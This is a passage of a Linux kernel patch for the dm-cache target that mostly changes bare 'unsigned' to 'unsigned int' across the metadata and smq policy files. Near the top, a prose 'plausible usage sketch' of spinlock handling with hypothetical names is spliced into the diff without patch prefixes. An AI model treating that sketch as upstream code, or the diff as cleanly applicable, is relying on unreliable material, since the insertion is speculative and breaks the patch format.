++void btracker_complete(struct background_tracker *b, struct policy_work *op);
++
++/*
++ * Predicate to see if an origin block is already scheduled for promotion.
++ */
+ bool btracker_promotion_already_present(struct background_tracker *b,
+ 					dm_oblock_t oblock);
+ 
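Since the new comments note the tracker itself is lock-free, a plausible usage sketch has the caller wrap each call in its own spinlock (all names hypothetical):

	spin_lock_irqsave(&cache->lock, flags);
	r = btracker_queue(cache->bg_work, &work, NULL);	/* policy side */
	spin_unlock_irqrestore(&cache->lock, flags);

	spin_lock_irqsave(&cache->lock, flags);
	r = btracker_issue(cache->bg_work, &w);			/* core target side */
	spin_unlock_irqrestore(&cache->lock, flags);
	if (!r) {
		do_background_work(w);
		spin_lock_irqsave(&cache->lock, flags);
		btracker_complete(cache->bg_work, w);
		spin_unlock_irqrestore(&cache->lock, flags);
	}
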
+diff --git a/drivers/md/dm-cache-metadata.c b/drivers/md/dm-cache-metadata.c
+index 83a5975bcc729..f5b4c996dc05f 100644
+--- a/drivers/md/dm-cache-metadata.c
++++ b/drivers/md/dm-cache-metadata.c
+@@ -104,7 +104,7 @@ struct dm_cache_metadata {
+ 	refcount_t ref_count;
+ 	struct list_head list;
+ 
+-	unsigned version;
++	unsigned int version;
+ 	struct block_device *bdev;
+ 	struct dm_block_manager *bm;
+ 	struct dm_space_map *metadata_sm;
+@@ -129,7 +129,7 @@ struct dm_cache_metadata {
+ 	bool clean_when_opened:1;
+ 
+ 	char policy_name[CACHE_POLICY_NAME_SIZE];
+-	unsigned policy_version[CACHE_POLICY_VERSION_SIZE];
++	unsigned int policy_version[CACHE_POLICY_VERSION_SIZE];
+ 	size_t policy_hint_size;
+ 	struct dm_cache_statistics stats;
+ 
+@@ -260,10 +260,10 @@ static int superblock_lock(struct dm_cache_metadata *cmd,
+ static int __superblock_all_zeroes(struct dm_block_manager *bm, bool *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -727,7 +727,7 @@ static int __commit_transaction(struct dm_cache_metadata *cmd,
+  */
+ #define FLAGS_MASK ((1 << 16) - 1)
+ 
+-static __le64 pack_value(dm_oblock_t block, unsigned flags)
++static __le64 pack_value(dm_oblock_t block, unsigned int flags)
+ {
+ 	uint64_t value = from_oblock(block);
+ 	value <<= 16;
+@@ -735,7 +735,7 @@ static __le64 pack_value(dm_oblock_t block, unsigned flags)
+ 	return cpu_to_le64(value);
+ }
+ 
+-static void unpack_value(__le64 value_le, dm_oblock_t *block, unsigned *flags)
++static void unpack_value(__le64 value_le, dm_oblock_t *block, unsigned int *flags)
+ {
+ 	uint64_t value = le64_to_cpu(value_le);
+ 	uint64_t b = value >> 16;
+@@ -749,7 +749,7 @@ static struct dm_cache_metadata *metadata_open(struct block_device *bdev,
+ 					       sector_t data_block_size,
+ 					       bool may_format_device,
+ 					       size_t policy_hint_size,
+-					       unsigned metadata_version)
++					       unsigned int metadata_version)
+ {
+ 	int r;
+ 	struct dm_cache_metadata *cmd;
+@@ -810,7 +810,7 @@ static struct dm_cache_metadata *lookup_or_open(struct block_device *bdev,
+ 						sector_t data_block_size,
+ 						bool may_format_device,
+ 						size_t policy_hint_size,
+-						unsigned metadata_version)
++						unsigned int metadata_version)
+ {
+ 	struct dm_cache_metadata *cmd, *cmd2;
+ 
+@@ -855,7 +855,7 @@ struct dm_cache_metadata *dm_cache_metadata_open(struct block_device *bdev,
+ 						 sector_t data_block_size,
+ 						 bool may_format_device,
+ 						 size_t policy_hint_size,
+-						 unsigned metadata_version)
++						 unsigned int metadata_version)
+ {
+ 	struct dm_cache_metadata *cmd = lookup_or_open(bdev, data_block_size, may_format_device,
+ 						       policy_hint_size, metadata_version);
+@@ -890,7 +890,7 @@ static int block_clean_combined_dirty(struct dm_cache_metadata *cmd, dm_cblock_t
+ 	int r;
+ 	__le64 value;
+ 	dm_oblock_t ob;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	r = dm_array_get_value(&cmd->info, cmd->root, from_cblock(b), &value);
+ 	if (r)
+@@ -1288,7 +1288,7 @@ static bool policy_unchanged(struct dm_cache_metadata *cmd,
+ 			     struct dm_cache_policy *policy)
+ {
+ 	const char *policy_name = dm_cache_policy_get_name(policy);
+-	const unsigned *policy_version = dm_cache_policy_get_version(policy);
++	const unsigned int *policy_version = dm_cache_policy_get_version(policy);
+ 	size_t policy_hint_size = dm_cache_policy_get_hint_size(policy);
+ 
+ 	/*
+@@ -1339,7 +1339,7 @@ static int __load_mapping_v1(struct dm_cache_metadata *cmd,
+ 	__le32 *hint_value_le;
+ 
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 	bool dirty = true;
+ 
+ 	dm_array_cursor_get_value(mapping_cursor, (void **) &mapping_value_le);
+@@ -1381,7 +1381,7 @@ static int __load_mapping_v2(struct dm_cache_metadata *cmd,
+ 	__le32 *hint_value_le;
+ 
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 	bool dirty = true;
+ 
+ 	dm_array_cursor_get_value(mapping_cursor, (void **) &mapping_value_le);
+@@ -1513,7 +1513,7 @@ static int __dump_mapping(void *context, uint64_t cblock, void *leaf)
+ {
+ 	__le64 value;
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	memcpy(&value, leaf, sizeof(value));
+ 	unpack_value(value, &oblock, &flags);
+@@ -1547,7 +1547,7 @@ int dm_cache_changed_this_transaction(struct dm_cache_metadata *cmd)
+ static int __dirty(struct dm_cache_metadata *cmd, dm_cblock_t cblock, bool dirty)
+ {
+ 	int r;
+-	unsigned flags;
++	unsigned int flags;
+ 	dm_oblock_t oblock;
+ 	__le64 value;
+ 
+@@ -1574,10 +1574,10 @@ static int __dirty(struct dm_cache_metadata *cmd, dm_cblock_t cblock, bool dirty
+ 
+ }
+ 
+-static int __set_dirty_bits_v1(struct dm_cache_metadata *cmd, unsigned nr_bits, unsigned long *bits)
++static int __set_dirty_bits_v1(struct dm_cache_metadata *cmd, unsigned int nr_bits, unsigned long *bits)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < nr_bits; i++) {
+ 		r = __dirty(cmd, to_cblock(i), test_bit(i, bits));
+ 		if (r)
+@@ -1594,7 +1594,7 @@ static int is_dirty_callback(uint32_t index, bool *value, void *context)
+ 	return 0;
+ }
+ 
+-static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned nr_bits, unsigned long *bits)
++static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned int nr_bits, unsigned long *bits)
+ {
+ 	int r = 0;
+ 
+@@ -1613,7 +1613,7 @@ static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned nr_bits,
+ }
+ 
+ int dm_cache_set_dirty_bits(struct dm_cache_metadata *cmd,
+-			    unsigned nr_bits,
++			    unsigned int nr_bits,
+ 			    unsigned long *bits)
+ {
+ 	int r;
+@@ -1712,7 +1712,7 @@ static int write_hints(struct dm_cache_metadata *cmd, struct dm_cache_policy *po
+ 	int r;
+ 	size_t hint_size;
+ 	const char *policy_name = dm_cache_policy_get_name(policy);
+-	const unsigned *policy_version = dm_cache_policy_get_version(policy);
++	const unsigned int *policy_version = dm_cache_policy_get_version(policy);
+ 
+ 	if (!policy_name[0] ||
+ 	    (strlen(policy_name) > sizeof(cmd->policy_name) - 1))
+diff --git a/drivers/md/dm-cache-metadata.h b/drivers/md/dm-cache-metadata.h
+index 0905f2c1615e1..b40322bc44cf7 100644
+--- a/drivers/md/dm-cache-metadata.h
++++ b/drivers/md/dm-cache-metadata.h
+@@ -60,7 +60,7 @@ struct dm_cache_metadata *dm_cache_metadata_open(struct block_device *bdev,
+ 						 sector_t data_block_size,
+ 						 bool may_format_device,
+ 						 size_t policy_hint_size,
+-						 unsigned metadata_version);
++						 unsigned int metadata_version);
+ 
+ void dm_cache_metadata_close(struct dm_cache_metadata *cmd);
+ 
+@@ -96,7 +96,7 @@ int dm_cache_load_mappings(struct dm_cache_metadata *cmd,
+ 			   void *context);
+ 
+ int dm_cache_set_dirty_bits(struct dm_cache_metadata *cmd,
+-			    unsigned nr_bits, unsigned long *bits);
++			    unsigned int nr_bits, unsigned long *bits);
+ 
+ struct dm_cache_statistics {
+ 	uint32_t read_hits;
+diff --git a/drivers/md/dm-cache-policy-internal.h b/drivers/md/dm-cache-policy-internal.h
+index 56f0a23f698c0..8e49baa78dc19 100644
+--- a/drivers/md/dm-cache-policy-internal.h
++++ b/drivers/md/dm-cache-policy-internal.h
+@@ -85,7 +85,7 @@ static inline void policy_tick(struct dm_cache_policy *p, bool can_block)
+ }
+ 
+ static inline int policy_emit_config_values(struct dm_cache_policy *p, char *result,
+-					    unsigned maxlen, ssize_t *sz_ptr)
++					    unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 	if (p->emit_config_values)
+@@ -112,18 +112,18 @@ static inline void policy_allow_migrations(struct dm_cache_policy *p, bool allow
+ /*
+  * Some utility functions commonly used by policies and the core target.
+  */
+-static inline size_t bitset_size_in_bytes(unsigned nr_entries)
++static inline size_t bitset_size_in_bytes(unsigned int nr_entries)
+ {
+ 	return sizeof(unsigned long) * dm_div_up(nr_entries, BITS_PER_LONG);
+ }
+ 
+-static inline unsigned long *alloc_bitset(unsigned nr_entries)
++static inline unsigned long *alloc_bitset(unsigned int nr_entries)
+ {
+ 	size_t s = bitset_size_in_bytes(nr_entries);
+ 	return vzalloc(s);
+ }
+ 
+-static inline void clear_bitset(void *bitset, unsigned nr_entries)
++static inline void clear_bitset(void *bitset, unsigned int nr_entries)
+ {
+ 	size_t s = bitset_size_in_bytes(nr_entries);
+ 	memset(bitset, 0, s);
+@@ -154,7 +154,7 @@ void dm_cache_policy_destroy(struct dm_cache_policy *p);
+  */
+ const char *dm_cache_policy_get_name(struct dm_cache_policy *p);
+ 
+-const unsigned *dm_cache_policy_get_version(struct dm_cache_policy *p);
++const unsigned int *dm_cache_policy_get_version(struct dm_cache_policy *p);
+ 
+ size_t dm_cache_policy_get_hint_size(struct dm_cache_policy *p);
+ 
+diff --git a/drivers/md/dm-cache-policy-smq.c b/drivers/md/dm-cache-policy-smq.c
+index a3d281fc14c3a..54343812223e8 100644
+--- a/drivers/md/dm-cache-policy-smq.c
++++ b/drivers/md/dm-cache-policy-smq.c
+@@ -23,12 +23,12 @@
+ /*
+  * Safe division functions that return zero on divide by zero.
+  */
+-static unsigned safe_div(unsigned n, unsigned d)
++static unsigned int safe_div(unsigned int n, unsigned int d)
+ {
+ 	return d ? n / d : 0u;
+ }
+ 
+-static unsigned safe_mod(unsigned n, unsigned d)
++static unsigned int safe_mod(unsigned int n, unsigned int d)
+ {
+ 	return d ? n % d : 0u;
+ }
+@@ -36,10 +36,10 @@ static unsigned safe_mod(unsigned n, unsigned d)
+ /*----------------------------------------------------------------*/
+ 
+ struct entry {
+-	unsigned hash_next:28;
+-	unsigned prev:28;
+-	unsigned next:28;
+-	unsigned level:6;
++	unsigned int hash_next:28;
++	unsigned int prev:28;
++	unsigned int next:28;
++	unsigned int level:6;
+ 	bool dirty:1;
+ 	bool allocated:1;
+ 	bool sentinel:1;
+@@ -62,7 +62,7 @@ struct entry_space {
+ 	struct entry *end;
+ };
+ 
+-static int space_init(struct entry_space *es, unsigned nr_entries)
++static int space_init(struct entry_space *es, unsigned int nr_entries)
+ {
+ 	if (!nr_entries) {
+ 		es->begin = es->end = NULL;
+@@ -82,7 +82,7 @@ static void space_exit(struct entry_space *es)
+ 	vfree(es->begin);
+ }
+ 
+-static struct entry *__get_entry(struct entry_space *es, unsigned block)
++static struct entry *__get_entry(struct entry_space *es, unsigned int block)
+ {
+ 	struct entry *e;
+ 
+@@ -92,13 +92,13 @@ static struct entry *__get_entry(struct entry_space *es, unsigned block)
+ 	return e;
+ }
+ 
+-static unsigned to_index(struct entry_space *es, struct entry *e)
++static unsigned int to_index(struct entry_space *es, struct entry *e)
+ {
+ 	BUG_ON(e < es->begin || e >= es->end);
+ 	return e - es->begin;
+ }
+ 
+-static struct entry *to_entry(struct entry_space *es, unsigned block)
++static struct entry *to_entry(struct entry_space *es, unsigned int block)
+ {
+ 	if (block == INDEXER_NULL)
+ 		return NULL;
+@@ -109,8 +109,8 @@ static struct entry *to_entry(struct entry_space *es, unsigned block)
+ /*----------------------------------------------------------------*/
+ 
+ struct ilist {
+-	unsigned nr_elts;	/* excluding sentinel entries */
+-	unsigned head, tail;
++	unsigned int nr_elts;	/* excluding sentinel entries */
++	unsigned int head, tail;
+ };
+ 
+ static void l_init(struct ilist *l)
+@@ -252,23 +252,23 @@ static struct entry *l_pop_tail(struct entry_space *es, struct ilist *l)
+ struct queue {
+ 	struct entry_space *es;
+ 
+-	unsigned nr_elts;
+-	unsigned nr_levels;
++	unsigned int nr_elts;
++	unsigned int nr_levels;
+ 	struct ilist qs[MAX_LEVELS];
+ 
+ 	/*
+ 	 * We maintain a count of the number of entries we would like in each
+ 	 * level.
+ 	 */
+-	unsigned last_target_nr_elts;
+-	unsigned nr_top_levels;
+-	unsigned nr_in_top_levels;
+-	unsigned target_count[MAX_LEVELS];
++	unsigned int last_target_nr_elts;
++	unsigned int nr_top_levels;
++	unsigned int nr_in_top_levels;
++	unsigned int target_count[MAX_LEVELS];
+ };
+ 
+-static void q_init(struct queue *q, struct entry_space *es, unsigned nr_levels)
++static void q_init(struct queue *q, struct entry_space *es, unsigned int nr_levels)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	q->es = es;
+ 	q->nr_elts = 0;
+@@ -284,7 +284,7 @@ static void q_init(struct queue *q, struct entry_space *es, unsigned nr_levels)
+ 	q->nr_in_top_levels = 0u;
+ }
+ 
+-static unsigned q_size(struct queue *q)
++static unsigned int q_size(struct queue *q)
+ {
+ 	return q->nr_elts;
+ }
+@@ -332,9 +332,9 @@ static void q_del(struct queue *q, struct entry *e)
+ /*
+  * Return the oldest entry of the lowest populated level.
+  */
+-static struct entry *q_peek(struct queue *q, unsigned max_level, bool can_cross_sentinel)
++static struct entry *q_peek(struct queue *q, unsigned int max_level, bool can_cross_sentinel)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct entry *e;
+ 
+ 	max_level = min(max_level, q->nr_levels);
+@@ -369,7 +369,7 @@ static struct entry *q_pop(struct queue *q)
+  * used by redistribute, so we know this is true.  It also doesn't adjust
+  * the q->nr_elts count.
+  */
+-static struct entry *__redist_pop_from(struct queue *q, unsigned level)
++static struct entry *__redist_pop_from(struct queue *q, unsigned int level)
+ {
+ 	struct entry *e;
+ 
+@@ -383,9 +383,10 @@ static struct entry *__redist_pop_from(struct queue *q, unsigned level)
+ 	return NULL;
+ }
+ 
+-static void q_set_targets_subrange_(struct queue *q, unsigned nr_elts, unsigned lbegin, unsigned lend)
++static void q_set_targets_subrange_(struct queue *q, unsigned int nr_elts,
++				    unsigned int lbegin, unsigned int lend)
+ {
+-	unsigned level, nr_levels, entries_per_level, remainder;
++	unsigned int level, nr_levels, entries_per_level, remainder;
+ 
+ 	BUG_ON(lbegin > lend);
+ 	BUG_ON(lend > q->nr_levels);
+@@ -426,7 +427,7 @@ static void q_set_targets(struct queue *q)
+ 
+ static void q_redistribute(struct queue *q)
+ {
+-	unsigned target, level;
++	unsigned int target, level;
+ 	struct ilist *l, *l_above;
+ 	struct entry *e;
+ 
+@@ -467,12 +468,12 @@ static void q_redistribute(struct queue *q)
+ 	}
+ }
+ 
+-static void q_requeue(struct queue *q, struct entry *e, unsigned extra_levels,
++static void q_requeue(struct queue *q, struct entry *e, unsigned int extra_levels,
+ 		      struct entry *s1, struct entry *s2)
+ {
+ 	struct entry *de;
+-	unsigned sentinels_passed = 0;
+-	unsigned new_level = min(q->nr_levels - 1u, e->level + extra_levels);
++	unsigned int sentinels_passed = 0;
++	unsigned int new_level = min(q->nr_levels - 1u, e->level + extra_levels);
+ 
+ 	/* try and find an entry to swap with */
+ 	if (extra_levels && (e->level < q->nr_levels - 1u)) {
+@@ -512,9 +513,9 @@ static void q_requeue(struct queue *q, struct entry *e, unsigned extra_levels,
+ #define EIGHTH (1u << (FP_SHIFT - 3u))
+ 
+ struct stats {
+-	unsigned hit_threshold;
+-	unsigned hits;
+-	unsigned misses;
++	unsigned int hit_threshold;
++	unsigned int hits;
++	unsigned int misses;
+ };
+ 
+ enum performance {
+@@ -523,7 +524,7 @@ enum performance {
+ 	Q_WELL
+ };
+ 
+-static void stats_init(struct stats *s, unsigned nr_levels)
++static void stats_init(struct stats *s, unsigned int nr_levels)
+ {
+ 	s->hit_threshold = (nr_levels * 3u) / 4u;
+ 	s->hits = 0u;
+@@ -535,7 +536,7 @@ static void stats_reset(struct stats *s)
+ 	s->hits = s->misses = 0u;
+ }
+ 
+-static void stats_level_accessed(struct stats *s, unsigned level)
++static void stats_level_accessed(struct stats *s, unsigned int level)
+ {
+ 	if (level >= s->hit_threshold)
+ 		s->hits++;
+@@ -556,7 +557,7 @@ static void stats_miss(struct stats *s)
+  */
+ static enum performance stats_assess(struct stats *s)
+ {
+-	unsigned confidence = safe_div(s->hits << FP_SHIFT, s->hits + s->misses);
++	unsigned int confidence = safe_div(s->hits << FP_SHIFT, s->hits + s->misses);
+ 
+ 	if (confidence < SIXTEENTH)
+ 		return Q_POOR;
+@@ -573,16 +574,16 @@ static enum performance stats_assess(struct stats *s)
+ struct smq_hash_table {
+ 	struct entry_space *es;
+ 	unsigned long long hash_bits;
+-	unsigned *buckets;
++	unsigned int *buckets;
+ };
+ 
+ /*
+  * All cache entries are stored in a chained hash table.  To save space we
+  * use indexing again, and only store indexes to the next entry.
+  */
+-static int h_init(struct smq_hash_table *ht, struct entry_space *es, unsigned nr_entries)
++static int h_init(struct smq_hash_table *ht, struct entry_space *es, unsigned int nr_entries)
+ {
+-	unsigned i, nr_buckets;
++	unsigned int i, nr_buckets;
+ 
+ 	ht->es = es;
+ 	nr_buckets = roundup_pow_of_two(max(nr_entries / 4u, 16u));
+@@ -603,7 +604,7 @@ static void h_exit(struct smq_hash_table *ht)
+ 	vfree(ht->buckets);
+ }
+ 
+-static struct entry *h_head(struct smq_hash_table *ht, unsigned bucket)
++static struct entry *h_head(struct smq_hash_table *ht, unsigned int bucket)
+ {
+ 	return to_entry(ht->es, ht->buckets[bucket]);
+ }
+@@ -613,7 +614,7 @@ static struct entry *h_next(struct smq_hash_table *ht, struct entry *e)
+ 	return to_entry(ht->es, e->hash_next);
+ }
+ 
+-static void __h_insert(struct smq_hash_table *ht, unsigned bucket, struct entry *e)
++static void __h_insert(struct smq_hash_table *ht, unsigned int bucket, struct entry *e)
+ {
+ 	e->hash_next = ht->buckets[bucket];
+ 	ht->buckets[bucket] = to_index(ht->es, e);
+@@ -621,11 +622,11 @@ static void __h_insert(struct smq_hash_table *ht, unsigned bucket, struct entry
+ 
+ static void h_insert(struct smq_hash_table *ht, struct entry *e)
+ {
+-	unsigned h = hash_64(from_oblock(e->oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(e->oblock), ht->hash_bits);
+ 	__h_insert(ht, h, e);
+ }
+ 
+-static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned h, dm_oblock_t oblock,
++static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned int h, dm_oblock_t oblock,
+ 				struct entry **prev)
+ {
+ 	struct entry *e;
+@@ -641,7 +642,7 @@ static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned h, dm_oblock
+ 	return NULL;
+ }
+ 
+-static void __h_unlink(struct smq_hash_table *ht, unsigned h,
++static void __h_unlink(struct smq_hash_table *ht, unsigned int h,
+ 		       struct entry *e, struct entry *prev)
+ {
+ 	if (prev)
+@@ -656,7 +657,7 @@ static void __h_unlink(struct smq_hash_table *ht, unsigned h,
+ static struct entry *h_lookup(struct smq_hash_table *ht, dm_oblock_t oblock)
+ {
+ 	struct entry *e, *prev;
+-	unsigned h = hash_64(from_oblock(oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(oblock), ht->hash_bits);
+ 
+ 	e = __h_lookup(ht, h, oblock, &prev);
+ 	if (e && prev) {
+@@ -673,7 +674,7 @@ static struct entry *h_lookup(struct smq_hash_table *ht, dm_oblock_t oblock)
+ 
+ static void h_remove(struct smq_hash_table *ht, struct entry *e)
+ {
+-	unsigned h = hash_64(from_oblock(e->oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(e->oblock), ht->hash_bits);
+ 	struct entry *prev;
+ 
+ 	/*
+@@ -689,16 +690,16 @@ static void h_remove(struct smq_hash_table *ht, struct entry *e)
+ 
+ struct entry_alloc {
+ 	struct entry_space *es;
+-	unsigned begin;
++	unsigned int begin;
+ 
+-	unsigned nr_allocated;
++	unsigned int nr_allocated;
+ 	struct ilist free;
+ };
+ 
+ static void init_allocator(struct entry_alloc *ea, struct entry_space *es,
+-			   unsigned begin, unsigned end)
++			   unsigned int begin, unsigned int end)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	ea->es = es;
+ 	ea->nr_allocated = 0u;
+@@ -742,7 +743,7 @@ static struct entry *alloc_entry(struct entry_alloc *ea)
+ /*
+  * This assumes the cblock hasn't already been allocated.
+  */
+-static struct entry *alloc_particular_entry(struct entry_alloc *ea, unsigned i)
++static struct entry *alloc_particular_entry(struct entry_alloc *ea, unsigned int i)
+ {
+ 	struct entry *e = __get_entry(ea->es, ea->begin + i);
+ 
+@@ -770,12 +771,12 @@ static bool allocator_empty(struct entry_alloc *ea)
+ 	return l_empty(&ea->free);
+ }
+ 
+-static unsigned get_index(struct entry_alloc *ea, struct entry *e)
++static unsigned int get_index(struct entry_alloc *ea, struct entry *e)
+ {
+ 	return to_index(ea->es, e) - ea->begin;
+ }
+ 
+-static struct entry *get_entry(struct entry_alloc *ea, unsigned index)
++static struct entry *get_entry(struct entry_alloc *ea, unsigned int index)
+ {
+ 	return __get_entry(ea->es, ea->begin + index);
+ }
+@@ -800,9 +801,9 @@ struct smq_policy {
+ 	sector_t cache_block_size;
+ 
+ 	sector_t hotspot_block_size;
+-	unsigned nr_hotspot_blocks;
+-	unsigned cache_blocks_per_hotspot_block;
+-	unsigned hotspot_level_jump;
++	unsigned int nr_hotspot_blocks;
++	unsigned int cache_blocks_per_hotspot_block;
++	unsigned int hotspot_level_jump;
+ 
+ 	struct entry_space es;
+ 	struct entry_alloc writeback_sentinel_alloc;
+@@ -831,7 +832,7 @@ struct smq_policy {
+ 	 * Keeps track of time, incremented by the core.  We use this to
+ 	 * avoid attributing multiple hits within the same tick.
+ 	 */
+-	unsigned tick;
++	unsigned int tick;
+ 
+ 	/*
+ 	 * The hash tables allows us to quickly find an entry by origin
+@@ -846,8 +847,8 @@ struct smq_policy {
+ 	bool current_demote_sentinels;
+ 	unsigned long next_demote_period;
+ 
+-	unsigned write_promote_level;
+-	unsigned read_promote_level;
++	unsigned int write_promote_level;
++	unsigned int read_promote_level;
+ 
+ 	unsigned long next_hotspot_period;
+ 	unsigned long next_cache_period;
+@@ -859,24 +860,24 @@ struct smq_policy {
+ 
+ /*----------------------------------------------------------------*/
+ 
+-static struct entry *get_sentinel(struct entry_alloc *ea, unsigned level, bool which)
++static struct entry *get_sentinel(struct entry_alloc *ea, unsigned int level, bool which)
+ {
+ 	return get_entry(ea, which ? level : NR_CACHE_LEVELS + level);
+ }
+ 
+-static struct entry *writeback_sentinel(struct smq_policy *mq, unsigned level)
++static struct entry *writeback_sentinel(struct smq_policy *mq, unsigned int level)
+ {
+ 	return get_sentinel(&mq->writeback_sentinel_alloc, level, mq->current_writeback_sentinels);
+ }
+ 
+-static struct entry *demote_sentinel(struct smq_policy *mq, unsigned level)
++static struct entry *demote_sentinel(struct smq_policy *mq, unsigned int level)
+ {
+ 	return get_sentinel(&mq->demote_sentinel_alloc, level, mq->current_demote_sentinels);
+ }
+ 
+ static void __update_writeback_sentinels(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct queue *q = &mq->dirty;
+ 	struct entry *sentinel;
+ 
+@@ -889,7 +890,7 @@ static void __update_writeback_sentinels(struct smq_policy *mq)
+ 
+ static void __update_demote_sentinels(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct queue *q = &mq->clean;
+ 	struct entry *sentinel;
+ 
+@@ -917,7 +918,7 @@ static void update_sentinels(struct smq_policy *mq)
+ 
+ static void __sentinels_init(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct entry *sentinel;
+ 
+ 	for (level = 0; level < NR_CACHE_LEVELS; level++) {
+@@ -1008,7 +1009,7 @@ static void requeue(struct smq_policy *mq, struct entry *e)
+ 	}
+ }
+ 
+-static unsigned default_promote_level(struct smq_policy *mq)
++static unsigned int default_promote_level(struct smq_policy *mq)
+ {
+ 	/*
+ 	 * The promote level depends on the current performance of the
+@@ -1030,9 +1031,9 @@ static unsigned default_promote_level(struct smq_policy *mq)
+ 		1, 1, 1, 2, 4, 6, 7, 8, 7, 6, 4, 4, 3, 3, 2, 2, 1
+ 	};
+ 
+-	unsigned hits = mq->cache_stats.hits;
+-	unsigned misses = mq->cache_stats.misses;
+-	unsigned index = safe_div(hits << 4u, hits + misses);
++	unsigned int hits = mq->cache_stats.hits;
++	unsigned int misses = mq->cache_stats.misses;
++	unsigned int index = safe_div(hits << 4u, hits + misses);
+ 	return table[index];
+ }
+ 
+@@ -1042,7 +1043,7 @@ static void update_promote_levels(struct smq_policy *mq)
+ 	 * If there are unused cache entries then we want to be really
+ 	 * eager to promote.
+ 	 */
+-	unsigned threshold_level = allocator_empty(&mq->cache_alloc) ?
++	unsigned int threshold_level = allocator_empty(&mq->cache_alloc) ?
+ 		default_promote_level(mq) : (NR_HOTSPOT_LEVELS / 2u);
+ 
+ 	threshold_level = max(threshold_level, NR_HOTSPOT_LEVELS);
+@@ -1124,7 +1125,7 @@ static void end_cache_period(struct smq_policy *mq)
+ #define CLEAN_TARGET 25u
+ #define FREE_TARGET 25u
+ 
+-static unsigned percent_to_target(struct smq_policy *mq, unsigned p)
++static unsigned int percent_to_target(struct smq_policy *mq, unsigned int p)
+ {
+ 	return from_cblock(mq->cache_size) * p / 100u;
+ }
+@@ -1150,7 +1151,7 @@ static bool clean_target_met(struct smq_policy *mq, bool idle)
+ 
+ static bool free_target_met(struct smq_policy *mq)
+ {
+-	unsigned nr_free;
++	unsigned int nr_free;
+ 
+ 	nr_free = from_cblock(mq->cache_size) - mq->cache_alloc.nr_allocated;
+ 	return (nr_free + btracker_nr_demotions_queued(mq->bg_work)) >=
+@@ -1300,7 +1301,7 @@ static dm_oblock_t to_hblock(struct smq_policy *mq, dm_oblock_t b)
+ 
+ static struct entry *update_hotspot_queue(struct smq_policy *mq, dm_oblock_t b)
+ {
+-	unsigned hi;
++	unsigned int hi;
+ 	dm_oblock_t hb = to_hblock(mq, b);
+ 	struct entry *e = h_lookup(&mq->hotspot_table, hb);
+ 
+@@ -1549,7 +1550,7 @@ static void smq_clear_dirty(struct dm_cache_policy *p, dm_cblock_t cblock)
+ 	spin_unlock_irqrestore(&mq->lock, flags);
+ }
+ 
+-static unsigned random_level(dm_cblock_t cblock)
++static unsigned int random_level(dm_cblock_t cblock)
+ {
+ 	return hash_32(from_cblock(cblock), 9) & (NR_CACHE_LEVELS - 1);
+ }
+@@ -1660,7 +1661,7 @@ static int mq_set_config_value(struct dm_cache_policy *p,
+ }
+ 
+ static int mq_emit_config_values(struct dm_cache_policy *p, char *result,
+-				 unsigned maxlen, ssize_t *sz_ptr)
++				 unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 
+@@ -1699,16 +1700,16 @@ static void init_policy_functions(struct smq_policy *mq, bool mimic_mq)
+ 
+ static bool too_many_hotspot_blocks(sector_t origin_size,
+ 				    sector_t hotspot_block_size,
+-				    unsigned nr_hotspot_blocks)
++				    unsigned int nr_hotspot_blocks)
+ {
+ 	return (hotspot_block_size * nr_hotspot_blocks) > origin_size;
+ }
+ 
+ static void calc_hotspot_params(sector_t origin_size,
+ 				sector_t cache_block_size,
+-				unsigned nr_cache_blocks,
++				unsigned int nr_cache_blocks,
+ 				sector_t *hotspot_block_size,
+-				unsigned *nr_hotspot_blocks)
++				unsigned int *nr_hotspot_blocks)
+ {
+ 	*hotspot_block_size = cache_block_size * 16u;
+ 	*nr_hotspot_blocks = max(nr_cache_blocks / 4u, 1024u);
+@@ -1724,9 +1725,9 @@ static struct dm_cache_policy *__smq_create(dm_cblock_t cache_size,
+ 					    bool mimic_mq,
+ 					    bool migrations_allowed)
+ {
+-	unsigned i;
+-	unsigned nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
+-	unsigned total_sentinels = 2u * nr_sentinels_per_queue;
++	unsigned int i;
++	unsigned int nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
++	unsigned int total_sentinels = 2u * nr_sentinels_per_queue;
+ 	struct smq_policy *mq = kzalloc(sizeof(*mq), GFP_KERNEL);
+ 
+ 	if (!mq)
+diff --git a/drivers/md/dm-cache-policy.c b/drivers/md/dm-cache-policy.c
+index c1a3cee99b445..2e58bbcf3e3bd 100644
+--- a/drivers/md/dm-cache-policy.c
++++ b/drivers/md/dm-cache-policy.c
+@@ -154,7 +154,7 @@ const char *dm_cache_policy_get_name(struct dm_cache_policy *p)
+ }
+ EXPORT_SYMBOL_GPL(dm_cache_policy_get_name);
+ 
